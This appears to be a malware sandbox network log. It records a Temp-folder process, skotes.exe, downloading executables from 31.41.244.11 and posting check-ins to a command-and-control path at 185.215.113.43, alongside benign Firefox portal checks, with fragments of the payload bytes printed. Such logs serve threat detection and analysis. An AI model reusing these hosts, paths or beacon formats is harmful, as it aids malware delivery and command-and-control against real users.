20	192.168.2.4	49939	31.41.244.11	80	3688	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 14, 2024 12:57:00.298971891 CET	61	OUT	GET /files/encoxx/random.exe HTTP/1.1 Host: 31.41.244.11
Dec 14, 2024 12:57:01.640140057 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 14 Dec 2024 11:57:01 GMT Content-Type: application/octet-stream Content-Length: 393728 Last-Modified: Thu, 12 Dec 2024 07:55:00 GMT Connection: keep-alive ETag: "675a96d4-60200" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d8 27 f3 e3 9c 46 9d b0 9c 46 9d b0 9c 46 9d b0 82 14 08 b0 85 46 9d b0 82 14 1e b0 e0 46 9d b0 82 14 19 b0 b6 46 9d b0 bb 80 e6 b0 95 46 9d b0 9c 46 9c b0 18 46 9d b0 82 14 17 b0 9d 46 9d b0 82 14 09 b0 9d 46 9d b0 82 14 0c b0 9d 46 9d b0 52 69 63 68 9c 46 9d b0 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 0c 66 a7 65 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 62 05 00 00 04 01 00 00 00 00 00 8f 51 00 00 00 10 00 00 00 80 05 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 b0 24 00 00 04 00 00 d1 cf 06 00 02 00 00 83 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$'FFFFFFFFFFFFRichFPELfebQ@$8gd0:-@.textab `.data`f@.rsrcz0<@@
Dec 14, 2024 12:57:01.640161037 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1c 6d 05 00 00 00 00 00 88 69 05 00 9c 69 05 00 b4 69 05 00 c8 69 05 00 e2 69 05 Data Ascii: miiiiijj*jDjXjnjjjjjjjjk k6kRkhkpikkkkkkkll(l>lRlblvllllllll
Dec 14, 2024 12:57:01.640178919 CET	448	IN	Data Raw: 69 6b 65 6c 79 20 74 68 65 20 72 65 73 75 6c 74 20 6f 66 20 63 61 6c 6c 69 6e 67 20 61 6e 20 4d 53 49 4c 2d 63 6f 6d 70 69 6c 65 64 20 28 2f 63 6c 72 29 20 66 75 6e 63 74 69 6f 6e 20 66 72 6f 6d 20 61 20 6e 61 74 69 76 65 20 63 6f 6e 73 74 72 75 Data Ascii: ikely the result of calling an MSIL-compiled (/clr) function from a native constructor or from DllMain.R6032- not enough space for locale informationR6031- Attempt to initialize the CRT more than once.This indicates a bug in y
Dec 14, 2024 12:57:01.640196085 CET	1236	IN	Data Raw: 36 30 32 35 0d 0a 2d 20 70 75 72 65 20 76 69 72 74 75 61 6c 20 66 75 6e 63 74 69 6f 6e 20 63 61 6c 6c 0d 0a 00 00 00 52 36 30 32 34 0d 0a 2d 20 6e 6f 74 20 65 6e 6f 75 67 68 20 73 70 61 63 65 20 66 6f 72 20 5f 6f 6e 65 78 69 74 2f 61 74 65 78 69 Data Ascii: 6025- pure virtual function callR6024- not enough space for _onexit/atexit tableR6019- unable to open console deviceR6018- unexpected heap errorR6017- unexpected multithread lock errorR6016- not enough
Dec 14, 2024 12:57:01.640213013 CET	1236	IN	Data Raw: 49 6e 66 6f 72 6d 61 74 69 6f 6e 41 00 00 00 47 65 74 4c 61 73 74 41 63 74 69 76 65 50 6f 70 75 70 00 00 47 65 74 41 63 74 69 76 65 57 69 6e 64 6f 77 00 4d 65 73 73 61 67 65 42 6f 78 41 00 55 53 45 52 33 32 2e 44 4c 4c 00 00 40 e6 45 00 98 e6 45 Data Ascii: InformationAGetLastActivePopupGetActiveWindowMessageBoxAUSER32.DLL@EEe+000~PAGAIsProcessorFeaturePresentKERNEL32_nextafter_logb_yn_y1_y0frexpfmod_hypot_cabsldexpmodffabs
Dec 14, 2024 12:57:01.640229940 CET	1236	IN	Data Raw: 00 84 00 84 00 84 00 84 00 84 00 84 00 84 00 84 00 10 00 10 00 10 00 10 00 10 00 10 00 10 00 81 01 81 01 81 01 81 01 81 01 81 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 Data Ascii: H
Dec 14, 2024 12:57:01.640249968 CET	1236	IN	Data Raw: 4d 00 00 44 65 63 65 6d 62 65 72 00 00 00 00 4e 6f 76 65 6d 62 65 72 00 00 00 00 4f 63 74 6f 62 65 72 00 53 65 70 74 65 6d 62 65 72 00 00 00 41 75 67 75 73 74 00 00 4a 75 6c 79 00 00 00 00 4a 75 6e 65 00 00 00 00 41 70 72 69 6c 00 00 00 4d 61 72 Data Ascii: MDecemberNovemberOctoberSeptemberAugustJulyJuneAprilMarchFebruaryJanuaryDecNovOctSepAugJulJunMayAprMarFebJanSaturdayFridayThursdayWednesdayTuesdayMondaySundaySatFriThuWedTue
Dec 14, 2024 12:57:01.640465975 CET	896	IN	Data Raw: 75 6c 74 20 63 6f 6e 73 74 72 75 63 74 6f 72 20 63 6c 6f 73 75 72 65 27 00 00 00 60 76 65 63 74 6f 72 20 64 65 6c 65 74 69 6e 67 20 64 65 73 74 72 75 63 74 6f 72 27 00 00 00 00 60 76 62 61 73 65 20 64 65 73 74 72 75 63 74 6f 72 27 00 00 60 73 74 Data Ascii: ult constructor closure'`vector deleting destructor'`vbase destructor'`string'`local static guard'`typeof'`vcall'`vbtable'`vftable'^=\|=&=<<=>>=%=/=-=+=*=\|\|&&\|^~(),>=><=<
Dec 14, 2024 12:57:01.640486956 CET	1236	IN	Data Raw: 00 00 00 43 4f 4e 4f 55 54 24 00 31 23 51 4e 41 4e 00 00 31 23 49 4e 46 00 00 00 31 23 49 4e 44 00 00 00 31 23 53 4e 41 4e 00 00 62 61 64 20 61 6c 6c 6f 63 61 74 69 6f 6e 00 00 6c 61 74 69 78 6f 77 61 6d 65 67 6f 6e 6f 6d 61 66 6f 63 75 62 61 67 Data Ascii: CONOUT$1#QNAN1#INF1#IND1#SNANbad allocationlatixowamegonomafocubagebekernel32.dllkernel32.dll00HE
Dec 14, 2024 12:57:01.640503883 CET	1236	IN	Data Raw: 75 f8 83 3d ec 0b 46 00 0c 89 75 e8 75 18 8d 4d d0 51 6a 00 6a 00 6a 00 ff 15 b4 10 40 00 6a 00 ff 15 a0 10 40 00 8b d6 c1 ea 05 89 55 f8 8b 45 e0 01 45 f8 8b 4d ec 8b c6 c1 e0 04 03 45 d4 8d 14 31 33 c2 33 45 f8 89 45 ec 8b 45 ec 29 45 f4 81 c1 Data Ascii: u=FuuMQjjj@j@UEEME133EEE)EGamM_EMU_^P[]UQF\|FSVWv`=\@D@E=FYu4jjjjjjjjj(@jj<@jjjj@VP
Dec 14, 2024 12:57:01.760135889 CET	1236	IN	Data Raw: c7 85 88 fe ff ff fc 69 50 23 c7 45 c4 54 f7 48 4f c7 85 4c ff ff ff c0 99 a9 2e c7 85 90 fe ff ff 08 fa ba 2b c7 45 f0 f8 7b 12 29 c7 45 a8 06 81 b9 04 c7 45 8c 22 ca da 48 c7 85 60 fe ff ff 18 f1 c2 6a c7 85 28 ff ff ff 9c df f9 37 c7 85 30 ff Data Ascii: iP#ETHOL.+E{)EE"H`j(709B^E]E0Zn;l^WhJ8VEd52S0at D3TAW*@OBE>oLLH'ED

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.4	49949	34.107.221.82	80	8032	C:\Program Files\Mozilla Firefox\firefox.exe

Timestamp	Bytes transferred	Direction	Data
Dec 14, 2024 12:57:03.738729954 CET	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Dec 14, 2024 12:57:04.826775074 CET	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Fri, 13 Dec 2024 14:40:27 GMT Age: 76597 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.4	49956	185.215.113.43	80	3688	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 14, 2024 12:57:05.010359049 CET	184	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 31 35 31 37 31 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1015171001&unit=246122658369
Dec 14, 2024 12:57:06.347476006 CET	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 14 Dec 2024 11:57:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.4	49958	34.107.221.82	80	8032	C:\Program Files\Mozilla Firefox\firefox.exe

Timestamp	Bytes transferred	Direction	Data
Dec 14, 2024 12:57:05.103995085 CET	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Dec 14, 2024 12:57:06.189121008 CET	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Fri, 13 Dec 2024 14:38:13 GMT Age: 76733 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
Dec 14, 2024 12:57:12.930913925 CET	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Dec 14, 2024 12:57:13.245800018 CET	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Fri, 13 Dec 2024 14:38:13 GMT Age: 76740 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
Dec 14, 2024 12:57:23.329696894 CET	6	OUT	Data Raw: 00 Data Ascii:
Dec 14, 2024 12:57:28.440181017 CET	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Dec 14, 2024 12:57:28.756638050 CET	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Fri, 13 Dec 2024 14:38:13 GMT Age: 76755 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
Dec 14, 2024 12:57:29.846528053 CET	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Dec 14, 2024 12:57:30.161406994 CET	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Fri, 13 Dec 2024 14:38:13 GMT Age: 76757 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
Dec 14, 2024 12:57:30.319106102 CET	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Dec 14, 2024 12:57:30.636775017 CET	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Fri, 13 Dec 2024 14:38:13 GMT Age: 76757 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
Dec 14, 2024 12:57:31.095000982 CET	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Dec 14, 2024 12:57:31.409751892 CET	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Fri, 13 Dec 2024 14:38:13 GMT Age: 76758 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
Dec 14, 2024 12:57:31.551964045 CET	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Dec 14, 2024 12:57:31.867414951 CET	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Fri, 13 Dec 2024 14:38:13 GMT Age: 76758 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
Dec 14, 2024 12:57:32.473392010 CET	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Dec 14, 2024 12:57:32.788378954 CET	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Fri, 13 Dec 2024 14:38:13 GMT Age: 76759 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
Dec 14, 2024 12:57:36.588679075 CET	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Dec 14, 2024 12:57:36.903496981 CET	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Fri, 13 Dec 2024 14:38:13 GMT Age: 76763 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
Dec 14, 2024 12:57:46.933564901 CET	6	OUT	Data Raw: 00 Data Ascii:
Dec 14, 2024 12:57:48.172671080 CET	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Dec 14, 2024 12:57:48.491154909 CET	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Fri, 13 Dec 2024 14:38:13 GMT Age: 76775 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
Dec 14, 2024 12:57:58.521033049 CET	6	OUT	Data Raw: 00 Data Ascii:
Dec 14, 2024 12:58:08.720895052 CET	6	OUT	Data Raw: 00 Data Ascii:
Dec 14, 2024 12:58:09.466085911 CET	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Dec 14, 2024 12:58:09.782063961 CET	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Fri, 13 Dec 2024 14:38:13 GMT Age: 76796 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
Dec 14, 2024 12:58:19.819412947 CET	6	OUT	Data Raw: 00 Data Ascii:
Dec 14, 2024 12:58:30.019787073 CET	6	OUT	Data Raw: 00 Data Ascii:
Dec 14, 2024 12:58:40.231791019 CET	6	OUT	Data Raw: 00 Data Ascii:
Dec 14, 2024 12:58:50.422561884 CET	6	OUT	Data Raw: 00 Data Ascii:
Dec 14, 2024 12:58:50.912197113 CET	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Dec 14, 2024 12:58:51.229765892 CET	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Fri, 13 Dec 2024 14:38:13 GMT Age: 76838 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
Dec 14, 2024 12:59:01.316632032 CET	6	OUT	Data Raw: 00 Data Ascii:
Dec 14, 2024 12:59:11.528328896 CET	6	OUT	Data Raw: 00 Data Ascii:
Dec 14, 2024 12:59:49.955477953 CET	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Dec 14, 2024 12:59:50.371984005 CET	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Fri, 13 Dec 2024 14:38:13 GMT Age: 76897 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
Dec 14, 2024 13:00:12.440035105 CET	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Dec 14, 2024 13:00:12.755712032 CET	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Fri, 13 Dec 2024 14:38:13 GMT Age: 76919 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.4	49961	31.41.244.11	80	3688	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 14, 2024 12:57:06.473237991 CET	62	OUT	GET /files/hell911/random.exe HTTP/1.1 Host: 31.41.244.11
Dec 14, 2024 12:57:07.809727907 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 14 Dec 2024 11:57:07 GMT Content-Type: application/octet-stream Content-Length: 2660864 Last-Modified: Thu, 12 Dec 2024 23:33:40 GMT Connection: keep-alive ETag: "675b72d4-289a00" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ed d3 a7 12 a9 b2 c9 41 a9 b2 c9 41 a9 b2 c9 41 e2 ca ca 40 a3 b2 c9 41 e2 ca cc 40 27 b2 c9 41 e2 ca cd 40 bd b2 c9 41 b8 34 ca 40 bd b2 c9 41 b8 34 cd 40 bb b2 c9 41 b8 34 cc 40 8f b2 c9 41 e2 ca c8 